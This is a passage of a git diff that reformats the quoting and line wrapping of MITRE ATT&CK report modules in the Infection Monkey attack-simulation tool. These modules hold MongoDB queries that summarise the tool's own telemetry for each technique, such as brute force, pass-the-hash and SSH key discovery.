"foreignField": "guid", + "as": "monkey_tmp", + } + }, + {"$addFields": {"_id": 0, "monkey_tmp": {"$arrayElemAt": ["$monkey_tmp", 0]}}}, + { + "$addFields": { + "monkey": {"hostname": "$monkey_tmp.hostname", "ips": "$monkey_tmp.ip_addresses"}, + "monkey_tmp": 0, + } + }, + ] @staticmethod def get_report_data(): @@ -40,5 +53,5 @@ class T1018(AttackTechnique): status, scan_info = get_technique_status_and_data() data = T1018.get_base_data_by_status(status) - data.update({'scan_info': scan_info}) + data.update({"scan_info": scan_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py index b017e7c85..9fe32b4d5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1021.py @@ -13,22 +13,26 @@ class T1021(AttackTechnique): used_msg = "Monkey successfully logged into remote services on the network." # Gets data about brute force attempts - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]} - } - } - } - }] + query = [ + {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}}, + { + "$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] - scanned_query = {'telem_category': 'exploit', - 'data.attempts': {'$elemMatch': {'result': True}}} + scanned_query = {"telem_category": "exploit", "data.attempts": {"$elemMatch": {"result": True}}} @staticmethod def get_report_data(): @@ -40,9 +44,9 @@ class T1021(AttackTechnique): if attempts: status = ScanStatus.USED.value for result in attempts: - result['successful_creds'] = [] - for attempt in result['attempts']: - result['successful_creds'].append(parse_creds(attempt)) + result["successful_creds"] = [] + for attempt in result["attempts"]: + result["successful_creds"].append(parse_creds(attempt)) else: status = ScanStatus.SCANNED.value else: @@ -52,5 +56,5 @@ class T1021(AttackTechnique): status, attempts = get_technique_status_and_data() data = T1021.get_base_data_by_status(status) - data.update({'services': attempts}) + data.update({"services": attempts}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py index e0694f3b4..d11a74b31 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1035.py @@ -12,5 +12,5 @@ class T1035(UsageTechnique): @staticmethod def get_report_data(): data = T1035.get_tech_base_data() - data.update({'services': T1035.get_usage_data()}) + data.update({"services": T1035.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py index b4548dac8..262c18204 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1041.py @@ -16,9 +16,14 @@ class T1041(AttackTechnique): @T1041.is_status_disabled def get_technique_status_and_data(): monkeys = list(Monkey.objects()) - info = [{'src': monkey['command_control_channel']['src'], - 'dst': monkey['command_control_channel']['dst']} - for monkey in monkeys if monkey['command_control_channel']] + info = [ + { + "src": monkey["command_control_channel"]["src"], + "dst": monkey["command_control_channel"]["dst"], + } + for monkey in monkeys + if monkey["command_control_channel"] + ] if info: status = ScanStatus.USED.value else: @@ -28,5 +33,5 @@ class T1041(AttackTechnique): status, info = get_technique_status_and_data() data = T1041.get_base_data_by_status(status) - data.update({'command_control_channel': info}) + data.update({"command_control_channel": info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py index 7ab1b5607..5e1944ff7 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1053.py @@ -6,7 +6,9 @@ __author__ = "shreyamalviya" class T1053(PostBreachTechnique): tech_id = "T1053" - unscanned_msg = "Monkey didn't try scheduling a job on Windows since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try scheduling a job on Windows since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried scheduling a job on the Windows system but failed." used_msg = "Monkey scheduled a job on the Windows system." pba_names = [POST_BREACH_JOB_SCHEDULING] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py index b702ddd58..dc97ef85b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1059.py @@ -11,15 +11,19 @@ class T1059(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully ran commands on exploited machines in the network." - query = [{'$match': {'telem_category': 'exploit', - 'data.info.executed_cmds': {'$exists': True, '$ne': []}}}, - {'$unwind': '$data.info.executed_cmds'}, - {'$sort': {'data.info.executed_cmds.powershell': 1}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info'}}, - {'$group': {'_id': '$machine', 'data': {'$push': '$$ROOT'}}}, - {'$project': {'_id': 0, 'data': {'$arrayElemAt': ['$data', 0]}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.info.executed_cmds": {"$exists": True, "$ne": []}, + } + }, + {"$unwind": "$data.info.executed_cmds"}, + {"$sort": {"data.info.executed_cmds.powershell": 1}}, + {"$project": {"_id": 0, "machine": "$data.machine", "info": "$data.info"}}, + {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}}, + {"$project": {"_id": 0, "data": {"$arrayElemAt": ["$data", 0]}}}, + ] @staticmethod def get_report_data(): @@ -33,7 +37,7 @@ class T1059(AttackTechnique): return (status, cmd_data) status, cmd_data = get_technique_status_and_data() - data = {'title': T1059.technique_title(), 'cmds': cmd_data} + data = {"title": T1059.technique_title(), "cmds": cmd_data} data.update(T1059.get_message_and_status(status)) data.update(T1059.get_mitigation_by_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py index 2c68c9ae4..1ca2ba62e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1064.py @@ -14,5 +14,5 @@ class T1064(UsageTechnique): def get_report_data(): data = T1064.get_tech_base_data() script_usages = list(mongo.db.telemetry.aggregate(T1064.get_usage_query())) - data.update({'scripts': script_usages}) + data.update({"scripts": script_usages}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py index 3b18be488..7734eb782 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1065.py @@ -16,6 +16,6 @@ class T1065(AttackTechnique): @staticmethod def get_report_data(): - port = ConfigService.get_config_value(CURRENT_SERVER_PATH).split(':')[1] + port = ConfigService.get_config_value(CURRENT_SERVER_PATH).split(":")[1] T1065.used_msg = T1065.message % port return T1065.get_base_data_by_status(ScanStatus.USED.value) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py index 5d3f270e7..36c409531 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1075.py @@ -7,26 +7,50 @@ __author__ = "VakarisZ" class T1075(AttackTechnique): tech_id = "T1075" - unscanned_msg = "Monkey didn't try to use pass the hash attack since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to use pass the hash attack since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to use hashes while logging in but didn't succeed." used_msg = "Monkey successfully used hashed credentials." - login_attempt_query = {'data.attempts': {'$elemMatch': {'$or': [{'ntlm_hash': {'$ne': ''}}, - {'lm_hash': {'$ne': ''}}]}}} + login_attempt_query = { + "data.attempts": { + "$elemMatch": {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]} + } + } # Gets data about successful PTH logins - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}, - '$elemMatch': {'$and': [{'$or': [{'ntlm_hash': {'$ne': ''}}, - {'lm_hash': {'$ne': ''}}]}, - {'result': True}]}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]}}}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.attempts": { + "$not": {"$size": 0}, + "$elemMatch": { + "$and": [ + {"$or": [{"ntlm_hash": {"$ne": ""}}, {"lm_hash": {"$ne": ""}}]}, + {"result": True}, + ] + }, + }, + } + }, + { + "$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] @staticmethod def get_report_data(): @@ -42,8 +66,8 @@ class T1075(AttackTechnique): return (status, successful_logins) status, successful_logins = get_technique_status_and_data() - data = {'title': T1075.technique_title()} - data.update({'successful_logins': successful_logins}) + data = {"title": T1075.technique_title()} + data.update({"successful_logins": successful_logins}) data.update(T1075.get_message_and_status(status)) data.update(T1075.get_mitigation_by_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py index 1a9ff94f8..7025a658c 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1082.py @@ -11,30 +11,63 @@ class T1082(AttackTechnique): scanned_msg = "" used_msg = "Monkey gathered system info from machines in the network." - query = [{'$match': {'telem_category': 'system_info', 'data.network_info': {'$exists': True}}}, - {'$project': {'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'aws': '$data.aws', - 'netstat': '$data.network_info.netstat', - 'process_list': '$data.process_list', - 'ssh_info': '$data.ssh_info', - 'azure_info': '$data.Azure'}}, - {'$project': {'_id': 0, - 'machine': 1, - 'collections': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$aws', {}]}]}, - 'name': {'$literal': 'Amazon Web Services info'}}, - {'used': {'$and': [{'$ifNull': ['$process_list', False]}, - {'$gt': ['$process_list', {}]}]}, - 'name': {'$literal': 'Running process list'}}, - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$ne': ['$netstat', []]}]}, - 'name': {'$literal': 'Network connections'}}, - {'used': {'$and': [{'$ifNull': ['$ssh_info', False]}, {'$ne': ['$ssh_info', []]}]}, - 'name': {'$literal': 'SSH info'}}, - {'used': {'$and': [{'$ifNull': ['$azure_info', False]}, {'$ne': ['$azure_info', []]}]}, - 'name': {'$literal': 'Azure info'}} - ]}}, - {'$group': {'_id': {'machine': '$machine', 'collections': '$collections'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}}, + { + "$project": { + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "aws": "$data.aws", + "netstat": "$data.network_info.netstat", + "process_list": "$data.process_list", + "ssh_info": "$data.ssh_info", + "azure_info": "$data.Azure", + } + }, + { + "$project": { + "_id": 0, + "machine": 1, + "collections": [ + { + "used": {"$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$aws", {}]}]}, + "name": {"$literal": "Amazon Web Services info"}, + }, + { + "used": { + "$and": [ + {"$ifNull": ["$process_list", False]}, + {"$gt": ["$process_list", {}]}, + ] + }, + "name": {"$literal": "Running process list"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$netstat", False]}, {"$ne": ["$netstat", []]}] + }, + "name": {"$literal": "Network connections"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$ssh_info", False]}, {"$ne": ["$ssh_info", []]}] + }, + "name": {"$literal": "SSH info"}, + }, + { + "used": { + "$and": [ + {"$ifNull": ["$azure_info", False]}, + {"$ne": ["$azure_info", []]}, + ] + }, + "name": {"$literal": "Azure info"}, + }, + ], + } + }, + {"$group": {"_id": {"machine": "$machine", "collections": "$collections"}}}, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): @@ -48,8 +81,8 @@ class T1082(AttackTechnique): return (status, system_info) status, system_info = get_technique_status_and_data() - data = {'title': T1082.technique_title()} - data.update({'system_info': system_info}) + data = {"title": T1082.technique_title()} + data.update({"system_info": system_info}) data.update(T1082.get_mitigation_by_status(status)) data.update(T1082.get_message_and_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py index d6237a3f7..d034d5316 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1086.py @@ -11,17 +11,30 @@ class T1086(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully ran powershell commands on exploited machines in the network." - query = [{'$match': {'telem_category': 'exploit', - 'data.info.executed_cmds': {'$elemMatch': {'powershell': True}}}}, - {'$project': {'machine': '$data.machine', - 'info': '$data.info'}}, - {'$project': {'_id': 0, - 'machine': 1, - 'info.finished': 1, - 'info.executed_cmds': {'$filter': {'input': '$info.executed_cmds', - 'as': 'command', - 'cond': {'$eq': ['$$command.powershell', True]}}}}}, - {'$group': {'_id': '$machine', 'data': {'$push': '$$ROOT'}}}] + query = [ + { + "$match": { + "telem_category": "exploit", + "data.info.executed_cmds": {"$elemMatch": {"powershell": True}}, + } + }, + {"$project": {"machine": "$data.machine", "info": "$data.info"}}, + { + "$project": { + "_id": 0, + "machine": 1, + "info.finished": 1, + "info.executed_cmds": { + "$filter": { + "input": "$info.executed_cmds", + "as": "command", + "cond": {"$eq": ["$$command.powershell", True]}, + } + }, + } + }, + {"$group": {"_id": "$machine", "data": {"$push": "$$ROOT"}}}, + ] @staticmethod def get_report_data(): @@ -35,7 +48,7 @@ class T1086(AttackTechnique): return (status, cmd_data) status, cmd_data = get_technique_status_and_data() - data = {'title': T1086.technique_title(), 'cmds': cmd_data} + data = {"title": T1086.technique_title(), "cmds": cmd_data} data.update(T1086.get_mitigation_by_status(status)) data.update(T1086.get_message_and_status(status)) diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py index f68ab1166..66078e0d0 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1090.py @@ -23,5 +23,5 @@ class T1090(AttackTechnique): status, monkeys = get_technique_status_and_data() data = T1090.get_base_data_by_status(status) - data.update({'proxies': monkeys}) + data.update({"proxies": monkeys}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py index 832976617..edcca2c2d 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -10,17 +10,22 @@ class T1105(AttackTechnique): scanned_msg = "Monkey tried to copy files, but failed." used_msg = "Monkey successfully copied files to systems on the network." - query = [{'$match': {'telem_category': 'attack', - 'data.technique': tech_id}}, - {'$project': {'_id': 0, - 'src': '$data.src', - 'dst': '$data.dst', - 'filename': '$data.filename'}}, - {'$group': {'_id': {'src': '$src', 'dst': '$dst', 'filename': '$filename'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": tech_id}}, + { + "$project": { + "_id": 0, + "src": "$data.src", + "dst": "$data.dst", + "filename": "$data.filename", + } + }, + {"$group": {"_id": {"src": "$src", "dst": "$dst", "filename": "$filename"}}}, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): data = T1105.get_tech_base_data() - data.update({'files': list(mongo.db.telemetry.aggregate(T1105.query))}) + data.update({"files": list(mongo.db.telemetry.aggregate(T1105.query))}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py index d07a66038..0dfc749cc 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1106.py @@ -12,5 +12,5 @@ class T1106(UsageTechnique): @staticmethod def get_report_data(): data = T1106.get_tech_base_data() - data.update({'api_uses': T1106.get_usage_data()}) + data.update({"api_uses": T1106.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py index 9448c2e6b..18f3a047b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1107.py @@ -10,23 +10,36 @@ class T1107(AttackTechnique): scanned_msg = "Monkey tried to delete files on systems in the network, but failed." used_msg = "Monkey successfully deleted files on systems in the network." - query = [{'$match': {'telem_category': 'attack', - 'data.technique': 'T1107'}}, - {'$lookup': {'from': 'monkey', - 'localField': 'monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey'}}, - {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]}, - 'status': '$data.status', - 'path': '$data.path'}}, - {'$addFields': {'_id': 0, - 'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'}, - 'monkey': 0}}, - {'$group': {'_id': {'machine': '$machine', 'status': '$status', 'path': '$path'}}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": "T1107"}}, + { + "$lookup": { + "from": "monkey", + "localField": "monkey_guid", + "foreignField": "guid", + "as": "monkey", + } + }, + { + "$project": { + "monkey": {"$arrayElemAt": ["$monkey", 0]}, + "status": "$data.status", + "path": "$data.path", + } + }, + { + "$addFields": { + "_id": 0, + "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"}, + "monkey": 0, + } + }, + {"$group": {"_id": {"machine": "$machine", "status": "$status", "path": "$path"}}}, + ] @staticmethod def get_report_data(): data = T1107.get_tech_base_data() deleted_files = list(mongo.db.telemetry.aggregate(T1107.query)) - data.update({'deleted_files': deleted_files}) + data.update({"deleted_files": deleted_files}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py index 63e6ba26f..118371ac5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1110.py @@ -13,15 +13,24 @@ class T1110(AttackTechnique): used_msg = "Monkey successfully used brute force in the network." # Gets data about brute force attempts - query = [{'$match': {'telem_category': 'exploit', - 'data.attempts': {'$not': {'$size': 0}}}}, - {'$project': {'_id': 0, - 'machine': '$data.machine', - 'info': '$data.info', - 'attempt_cnt': {'$size': '$data.attempts'}, - 'attempts': {'$filter': {'input': '$data.attempts', - 'as': 'attempt', - 'cond': {'$eq': ['$$attempt.result', True]}}}}}] + query = [ + {"$match": {"telem_category": "exploit", "data.attempts": {"$not": {"$size": 0}}}}, + { + "$project": { + "_id": 0, + "machine": "$data.machine", + "info": "$data.info", + "attempt_cnt": {"$size": "$data.attempts"}, + "attempts": { + "$filter": { + "input": "$data.attempts", + "as": "attempt", + "cond": {"$eq": ["$$attempt.result", True]}, + } + }, + } + }, + ] @staticmethod def get_report_data(): @@ -31,10 +40,10 @@ class T1110(AttackTechnique): succeeded = False for result in attempts: - result['successful_creds'] = [] - for attempt in result['attempts']: + result["successful_creds"] = [] + for attempt in result["attempts"]: succeeded = True - result['successful_creds'].append(parse_creds(attempt)) + result["successful_creds"].append(parse_creds(attempt)) if succeeded: status = ScanStatus.USED.value @@ -48,7 +57,7 @@ class T1110(AttackTechnique): data = T1110.get_base_data_by_status(status) # Remove data with no successful brute force attempts - attempts = [attempt for attempt in attempts if attempt['attempts']] + attempts = [attempt for attempt in attempts if attempt["attempts"]] - data.update({'services': attempts}) + data.update({"services": attempts}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py index 3a13c5101..e0d079d7e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1129.py @@ -5,12 +5,14 @@ __author__ = "VakarisZ" class T1129(UsageTechnique): tech_id = "T1129" - unscanned_msg = "Monkey didn't try to load any DLLs since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to load any DLLs since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to load DLLs, but failed." used_msg = "Monkey successfully loaded DLLs using Windows module loader." @staticmethod def get_report_data(): data = T1129.get_tech_base_data() - data.update({'dlls': T1129.get_usage_data()}) + data.update({"dlls": T1129.get_usage_data()}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py index d9d86e08e..dfc5945a3 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1136.py @@ -1,4 +1,7 @@ -from common.common_consts.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER +from common.common_consts.post_breach_consts import ( + POST_BREACH_BACKDOOR_USER, + POST_BREACH_COMMUNICATE_AS_NEW_USER, +) from monkey_island.cc.services.attack.technique_reports.pba_technique import PostBreachTechnique __author__ = "shreyamalviya" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py index 5d96d863e..82dccf639 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1145.py @@ -12,11 +12,21 @@ class T1145(AttackTechnique): used_msg = "Monkey found ssh keys on machines in the network." # Gets data about ssh keys found - query = [{'$match': {'telem_category': 'system_info', - 'data.ssh_info': {'$elemMatch': {'private_key': {'$exists': True}}}}}, - {'$project': {'_id': 0, - 'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'ssh_info': '$data.ssh_info'}}] + query = [ + { + "$match": { + "telem_category": "system_info", + "data.ssh_info": {"$elemMatch": {"private_key": {"$exists": True}}}, + } + }, + { + "$project": { + "_id": 0, + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "ssh_info": "$data.ssh_info", + } + }, + ] @staticmethod def get_report_data(): @@ -32,5 +42,5 @@ class T1145(AttackTechnique): status, ssh_info = get_technique_status_and_data() data = T1145.get_base_data_by_status(status) - data.update({'ssh_info': ssh_info}) + data.update({"ssh_info": ssh_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py index e1ca3423f..9391e52e9 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1146.py @@ -6,16 +6,30 @@ __author__ = "shreyamalviya" class T1146(PostBreachTechnique): tech_id = "T1146" - unscanned_msg = "Monkey didn't try clearing the command history since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try clearing the command history since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried clearing the command history but failed." used_msg = "Monkey successfully cleared the command history (and then restored it back)." pba_names = [POST_BREACH_CLEAR_CMD_HISTORY] @staticmethod def get_pba_query(*args): - return [{'$match': {'telem_category': 'post_breach', - 'data.name': POST_BREACH_CLEAR_CMD_HISTORY}}, - {'$project': {'_id': 0, - 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, - 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, - 'result': '$data.result'}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "data.name": POST_BREACH_CLEAR_CMD_HISTORY, + } + }, + { + "$project": { + "_id": 0, + "machine": { + "hostname": {"$arrayElemAt": ["$data.hostname", 0]}, + "ips": [{"$arrayElemAt": ["$data.ip", 0]}], + }, + "result": "$data.result", + } + }, + ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py index 0b2fdf41e..abd32f78f 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1156.py @@ -6,19 +6,36 @@ __author__ = "shreyamalviya" class T1156(PostBreachTechnique): tech_id = "T1156" - unscanned_msg = "Monkey didn't try modifying bash startup files since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try modifying bash startup files since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried modifying bash startup files but failed." used_msg = "Monkey successfully modified bash startup files." pba_names = [POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION] @staticmethod def get_pba_query(*args): - return [{'$match': {'telem_category': 'post_breach', - 'data.name': POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION}}, - {'$project': {'_id': 0, - 'machine': {'hostname': {'$arrayElemAt': ['$data.hostname', 0]}, - 'ips': [{'$arrayElemAt': ['$data.ip', 0]}]}, - 'result': '$data.result'}}, - {'$unwind': '$result'}, - {'$match': {'$or': [{'result': {'$regex': r'\.bash'}}, - {'result': {'$regex': r'\.profile'}}]}}] + return [ + { + "$match": { + "telem_category": "post_breach", + "data.name": POST_BREACH_SHELL_STARTUP_FILE_MODIFICATION, + } + }, + { + "$project": { + "_id": 0, + "machine": { + "hostname": {"$arrayElemAt": ["$data.hostname", 0]}, + "ips": [{"$arrayElemAt": ["$data.ip", 0]}], + }, + "result": "$data.result", + } + }, + {"$unwind": "$result"}, + { + "$match": { + "$or": [{"result": {"$regex": r"\.bash"}}, {"result": {"$regex": r"\.profile"}}] + } + }, + ] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py index a690086dc..5e387a6ba 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1168.py @@ -6,7 +6,9 @@ __author__ = "shreyamalviya" class T1168(PostBreachTechnique): tech_id = "T1168" - unscanned_msg = "Monkey didn't try scheduling a job on Linux since it didn't run on any Linux machines." + unscanned_msg = ( + "Monkey didn't try scheduling a job on Linux since it didn't run on any Linux machines." + ) scanned_msg = "Monkey tried scheduling a job on the Linux system but failed." used_msg = "Monkey scheduled a job on the Linux system." pba_names = [POST_BREACH_JOB_SCHEDULING] diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py index 2dbf87638..473e2b9df 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1188.py @@ -24,14 +24,18 @@ class T1188(AttackTechnique): proxy_count += 1 proxy = proxy.tunnel if proxy_count > 1: - hops.append({'from': initial.get_network_info(), - 'to': proxy.get_network_info(), - 'count': proxy_count}) + hops.append( + { + "from": initial.get_network_info(), + "to": proxy.get_network_info(), + "count": proxy_count, + } + ) status = ScanStatus.USED.value if hops else ScanStatus.UNSCANNED.value return (status, hops) status, hops = get_technique_status_and_data() data = T1188.get_base_data_by_status(status) - data.update({'hops': hops}) + data.update({"hops": hops}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py index b87aeb275..be1b669f6 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1197.py @@ -6,22 +6,29 @@ __author__ = "VakarisZ" class T1197(AttackTechnique): tech_id = "T1197" - unscanned_msg = "Monkey didn't try to use any bits jobs since it didn't run on any Windows machines." + unscanned_msg = ( + "Monkey didn't try to use any bits jobs since it didn't run on any Windows machines." + ) scanned_msg = "Monkey tried to use bits jobs but failed." used_msg = "Monkey successfully used bits jobs at least once in the network." @staticmethod def get_report_data(): data = T1197.get_tech_base_data() - bits_results = mongo.db.telemetry.aggregate([{'$match': {'telem_category': 'attack', - 'data.technique': T1197.tech_id}}, - {'$group': {'_id': {'ip_addr': '$data.machine.ip_addr', - 'usage': '$data.usage'}, - 'ip_addr': {'$first': '$data.machine.ip_addr'}, - 'domain_name': {'$first': '$data.machine.domain_name'}, - 'usage': {'$first': '$data.usage'}, - 'time': {'$first': '$timestamp'}} - }]) + bits_results = mongo.db.telemetry.aggregate( + [ + {"$match": {"telem_category": "attack", "data.technique": T1197.tech_id}}, + { + "$group": { + "_id": {"ip_addr": "$data.machine.ip_addr", "usage": "$data.usage"}, + "ip_addr": {"$first": "$data.machine.ip_addr"}, + "domain_name": {"$first": "$data.machine.domain_name"}, + "usage": {"$first": "$data.usage"}, + "time": {"$first": "$timestamp"}, + } + }, + ] + ) bits_results = list(bits_results) - data.update({'bits_jobs': 